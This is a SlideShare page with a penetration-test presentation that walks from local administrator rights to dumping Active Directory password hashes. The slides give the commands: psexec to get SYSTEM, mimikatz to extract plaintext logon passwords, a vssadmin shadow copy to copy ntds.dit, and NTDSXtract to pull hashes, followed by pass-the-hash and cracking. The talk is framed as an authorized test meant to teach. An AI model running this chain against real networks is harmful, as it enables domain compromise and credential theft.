Your SlideShare is downloading. ×
0
The Fall of a Domain
LOCAL ADMIN TO DOMAIN USER HASHES

Riyaz Walikar
Disclaimer
 It was far more painstaking and complicated than

this!
 Demo setup to show execution path
 All the command...
Please exercise caution!
The story so far
 Remote RDP access to a machine on the client

network via VPN
 Local Administrator rights to simulate ...
Visually. This.
Local Admin eh?
 Locally logged in as TARDISfwhite
 Domain limited user but local admin
 Other users connected? [Task M...
Think Sysinternals!
 psexec –s –i cmd.exe
Dump connected user credentials
 mimikatz – Benjamin Delpy
 Extracts plaintext passwords from memory
 Wdigest, tspkg, k...
Windows (In)Security?
Now what?

http://gapingvoid.com/2008/06/13/now-what/
Remote CMD anyone?
 RDP directly!
 Lets be discreet 
 psexec -s –u TARDISatomboy 10.10.10.1 cmd.exe
 Game already ove...
Lets grab some hashes 
 Active Directory stores user information in

%systemroot%ntdsntds.dit
 Locked during system usa...
Lets grab some hashes 
 backup readable by nt authoritysystem and

administrators
 We need the ntds.dit and SYSTEM file...
Core files needed
NTDS.dit structure parse?
 NTDSXtract - A framework for offline forensic

analysis of ntds.dit
 Need the libesedb module...
get framework + compile + make + run
 wget

http://ntdsxtract.com/downloads/ntdsxtract/ntdsxt
ract_v1_0.zip
 wget

http:...
get framework + compile + make + run
 cd ntds_dump_hash/libesedb
 ./configure && make
 cd libesedb/esedbtools
 ./esedb...
Yay!
 python ../../ntdsxtract/dsusers.py datatable

link_table --passwordhashes <system_file> –
passwordhistory <system_f...
Now what?

http://gapingvoid.com/2008/06/13/now-what/
Pass the hash / Password Cracking!
 Use the Windows Credentials Editor – Amplia

Security
 Password Cracking >> Humla pe...
References
 http://blog.gentilkiwi.com/mimikatz
 http://www.ampliasecurity.com/research/wcefaq.ht

ml
 http://bernardod...
Thank you

riyazwalikar@gmail.com
http://www.riyazwalikar.com
Fall of a domain | From local admin to Domain user hashes
Upcoming SlideShare
Loading in...5
×

Fall of a domain | From local admin to Domain user hashes

3,316

Published on

Author: Riyaz Walikar

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
3,316
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
29
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Transcript of "Fall of a domain | From local admin to Domain user hashes"

  1. 1. The Fall of a Domain LOCAL ADMIN TO DOMAIN USER HASHES Riyaz Walikar
  2. 2. Disclaimer  It was far more painstaking and complicated than this!  Demo setup to show execution path  All the commands were actually used in the pentest  Please do not try this on your office/corporate environment without written permission
  3. 3. Please exercise caution!
  4. 4. The story so far  Remote RDP access to a machine on the client network via VPN  Local Administrator rights to simulate an employee  User is a limited domain user  Domain controller on the same network, reachable with LDAP services running
  5. 5. Visually. This.
  6. 6. Local Admin eh?  Locally logged in as TARDISfwhite  Domain limited user but local admin  Other users connected? [Task Manager > Users]  Found another user connected to our system via RDP –sweet! (possibly domain admin )  Need system privs! Any ideas?
  7. 7. Think Sysinternals!  psexec –s –i cmd.exe
  8. 8. Dump connected user credentials  mimikatz – Benjamin Delpy  Extracts plaintext passwords from memory  Wdigest, tspkg, kerberos and many more  mimikatz  privilege::debug  token::elevate  sekurlsa::logonPasswords
  9. 9. Windows (In)Security?
  10. 10. Now what? http://gapingvoid.com/2008/06/13/now-what/
  11. 11. Remote CMD anyone?  RDP directly!  Lets be discreet   psexec -s –u TARDISatomboy 10.10.10.1 cmd.exe  Game already over!  Instead RDP with user credentials and present report
  12. 12. Lets grab some hashes   Active Directory stores user information in %systemroot%ntdsntds.dit  Locked during system usage  ntdsutil + snapshot = backup (> Windows 2008)  vssadmin create shadow /for=C: (> Windows 2003)
  13. 13. Lets grab some hashes   backup readable by nt authoritysystem and administrators  We need the ntds.dit and SYSTEM files  cd / dir /other inbuilt cmd commands do not work on unmounted volume shadow copies  copy works!
  14. 14. Core files needed
  15. 15. NTDS.dit structure parse?  NTDSXtract - A framework for offline forensic analysis of ntds.dit  Need the libesedb module as well  libesedb and creddump in ntds_dump_hashes.zip  wget to a linux box (Kali is a good choice)
  16. 16. get framework + compile + make + run  wget http://ntdsxtract.com/downloads/ntdsxtract/ntdsxt ract_v1_0.zip  wget http://ntdsxtract.com/downloads/ntds_dump_hash .zip  unzip both
  17. 17. get framework + compile + make + run  cd ntds_dump_hash/libesedb  ./configure && make  cd libesedb/esedbtools  ./esedbexport -l /tmp/ntds.log <ntds.dit>
  18. 18. Yay!  python ../../ntdsxtract/dsusers.py datatable link_table --passwordhashes <system_file> – passwordhistory <system_file>  Cleanup the output with ntdstopwdump.py (https://raw.github.com/inquisb/miscellaneous/mas ter/ntdstopwdump.py)
  19. 19. Now what? http://gapingvoid.com/2008/06/13/now-what/
  20. 20. Pass the hash / Password Cracking!  Use the Windows Credentials Editor – Amplia Security  Password Cracking >> Humla perhaps 
  21. 21. References  http://blog.gentilkiwi.com/mimikatz  http://www.ampliasecurity.com/research/wcefaq.ht ml  http://bernardodamele.blogspot.in/2011/12/dumpwindows-password-hashes_16.html
  22. 22. Thank you riyazwalikar@gmail.com http://www.riyazwalikar.com
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×